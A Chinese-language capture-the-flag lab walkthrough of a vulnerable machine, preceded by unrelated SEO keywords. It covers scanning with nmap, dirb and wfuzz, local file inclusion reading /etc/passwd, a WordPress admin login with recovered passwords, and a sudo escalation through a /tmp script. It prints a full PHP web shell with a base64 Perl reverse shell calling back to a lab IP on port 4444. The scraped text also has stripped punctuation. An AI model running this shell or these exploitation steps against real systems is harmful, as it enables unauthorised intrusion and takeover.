兰州网页制作公司网站,沈阳建站模板,网站跳出率计算,新公司名称取名一、信息收集
1.nmap扫描
┌──(root#x1f480;kali)-[~/桌面]
└─# arp-scan -l┌──(root#x1f480;kali)-[~/桌面]
└─# nmap -sS -A -p- 192.168.103.202发现开放了22和80端口 2.web页面
打开80端口的web页面#xff0c;是一张静态的图片#xff0c;没什么价…一、信息收集
1.nmap扫描
┌──(rootkali)-[~/桌面]
└─# arp-scan -l┌──(rootkali)-[~/桌面]
└─# nmap -sS -A -p- 192.168.103.202发现开放了22和80端口 2.web页面
打开80端口的web页面是一张静态的图片没什么价值看看页面源代码 右击查看网页源代码也没有发现什么有价值的信息 3.目录扫描
┌──(rootkali)-[~/桌面]
└─# dirsearch -u http://192.168.103.202扫描发现有/dev、/javascript、/wordpress/wp-login.php目录
/dev这个目录比较可疑不常见访问下看看 他提示我们要非常努力的使用工具去深挖web。说明我们的扫描还没有扫描完全没有挖透所以这里利用dirb X参数目录扫描工具再进行加一些参数搞一个字典再进行目录爆破
我们可以选择带有.txt和.zip的一些文件后缀名再进行目录扫描一下
┌──(rootkali)-[~/桌面]
└─# dirb http://192.168.103.202 -X .zip,.txt打开一下这个扫描出来的.txt文件查看一下文件内容
下面圈起来就是以下内容提示的重点了 //解释
在你发现的每个php页面进行模糊测试吧如果你得到了任何正确的参数就跟着如下的步骤进行。
如果你依然卡住学习一些OSCP基本工具的使用
链接是https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
当你有了下一步进展之后去看看location.txt并给出了模糊测试工具的github链接同时还提示了我们有了下一步进展之后去看看location.txt。那么我们首先要做的应该是去寻找php页面。依旧使用dirb
┌──(rootkali)-[~/桌面]
└─# dirb http://192.168.103.202 -X .zip,.txt,.php两个.phpimage.php index.php 二、漏洞利用
1.wfuzz
先查看下那个gethub提示的那个链接
可找到参数应该是-c高亮显示-w 使用字典进行尝试把需要测试的页面改为image.php即可github链接中还给出了范例命令
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://website.com/secret.php?FUZZsomething测试.php的目录命令如下
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.103.202/index.php?FUZZ这个结果可以看到列表中的Chars列基本都是136 Ch
使用参数--hh 136 进行过滤显示Chars列结果不含136的payload
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://192.168.103.202/index.php?FUZZ成功找到了一个payload名为file这应该是我们要关注的位置。我们用curl或浏览器查看192.168.103.202/index.php?file
curl 192.168.103.202/index.php?file发现比起前面的图片多了这两句话 他这里提示我们挖错文件了。
想起了刚才的secret.txt提示我们有了下一步进展之后去看看location.txt那我们就把location.txt作为参数传给file试试
curl http://192.168.103.202/index.php?filelocation.txt提示修改传参的参数并且使用别的.php文件
curl http://192.168.103.202/image.php?secrettier360提示我说拿到了正确的参数现在可以用这个参数进行传参数了这个一看传参就想到了应该会有文件包含漏洞
2.文件包含
先不管啥一般文件包含先试试读取一下/etc/passwd文件
发现成功读取到了/etc/passwd
http://192.168.103.202/image.php?secrettier360../../../../../../etc/passwd成功读取并回显了/etc/passwd浏览器的效果看的头晕还是用curl看一下**
┌──(rootkali)-[~/桌面]
└─# curl http://192.168.103.202/image.php?secrettier360../../../../../../etc/passwd发现root,victor账户有bash环境同时还在saket发现一句话find password.txt file in my directory:/home/saket莫非是提醒我们在/home/saket/password.txt存在信息 那我们再用文件包含看一下/home/saket/password.txt 文件包含漏洞访问之后password.txt中写了follow_the_ippsec 怀疑这可能是某个账号的密码应该是个很关键的信息。最后再试试能不能直接访问/etc/shadow。很遗憾并不行浏览器和curl都无法看到回显。
3.wordpress CMS渗透
follow_the_ippsec应该就是一个密码开始发现了开启了22端口所以试试ssh登录账号用开始/etc/passwd上面的root,victor,saket但是发现都失败了
之前的那个用dirb扫描的目录还有一个wordpress这个还没有去渗透测试所以现在把方向放wordpress上面。
说不定是wordpress这个cms的后台登录密码
先访问目录 发现用户名victor用户 这个是wp的默认登录位置
http://192.168.103.202/wordpress/wp-admin/
发现成功登录进去了
用户名victor
密码follow_the_ippsec通过这个步骤去找找里面哪些具有可写可执行且具有可以保存的功能的.php文件 之前写过一个这种类似的可以利用404.php来写入一个反弹shell的木马但是这个WP发现没有提交这个功能所以得去找哪个具有可写入以及可提交的.php文件 然后再secret.php文件找到可以写入并且有提交保存的功能的.php文件 /* Ohh Finaly you got a writable file */ 4.反弹shell GIF89a
?php
function which($pr) {
$path execute(which $pr);
return ($path ? $path : $pr);
}
function execute($cfe) {
$res ;
if ($cfe) {
if(function_exists(exec)) {
exec($cfe,$res);
$res join(\n,$res);
} elseif(function_exists(shell_exec)) {
$res shell_exec($cfe);
} elseif(function_exists(system)) {
ob_start();
system($cfe);
$res ob_get_contents();
ob_end_clean();
} elseif(function_exists(passthru)) {
ob_start();
passthru($cfe);
$res ob_get_contents();
ob_end_clean();
} elseif(is_resource($f popen($cfe,r))) {
$res ;
while(!feof($f)) {
$res . fread($f,1024);
}
pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fpfopen($fname,w)) {
fputs($fp,base64_decode($text));
fclose($fp);
}
}
$yourip 192.168.103.129;
$yourport 4444;
$usedb array(perlperl,cc);
$back_connectIyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj.
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR.
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT.
sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI.
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi.
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl.
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw;
cf(/tmp/.bc,$back_connect);
$res execute(which(perl). /tmp/.bc $yourip $yourport );
?点击提交保存成功 在这里面可以找到哪个secret.php的文件上传的位置
/themes/twentynineteen/ 因此我们要访问的路径就是/themes/twentynineteen/secret.php至于/themes前面的路径是啥应该是wordpress主题的固定路径也就是/wordpress/wp-content这个可以在互联网上搜索到wordpress的主题编辑页面的路径。因此完整的路径是
http://192.168.103.202/wordpress/wp-content/themes/twentynineteen/secret.phppython -c import pty; pty.spawn (/bin/bash) #交互式shell
可以看到反弹成功了 三、提权
1.user.flag
开始我是直接到/home,查看有什么可以利用的账户发现了saket账户里面有passwd和user
账号saket
密码tribute_to_ippsecuser.txt是一串数字这应该就是user的flag 2.ssh连接
账号saket
密码tribute_to_ippsecpython -c import pty;pty.spawn(/bin/bash) #交互式shell 3.sudo提权 提示我们可以无密码的形式以root运行/home/victor/undefeated_victor那咱就运行试试
sudo /home/victor/undefeated_victor我们去/tmp目录下看看有没有这个challenge文件发现确实不存在 echo的方式创建challenge并追加命令
echo #!/bin/bash challenge
echo /bin/bash challengesaketubuntu:/tmp$ chmod -R 777 challenge
saketubuntu:/tmp$ ls -la
-rwxrwxrwx 1 saket saket 22 Nov 8 21:09 challenge这样应该就可以执行了再次执行/home/victor/undefeated_victor即可提权成功
sudo /home/victor/undefeated_victor4.root.flag
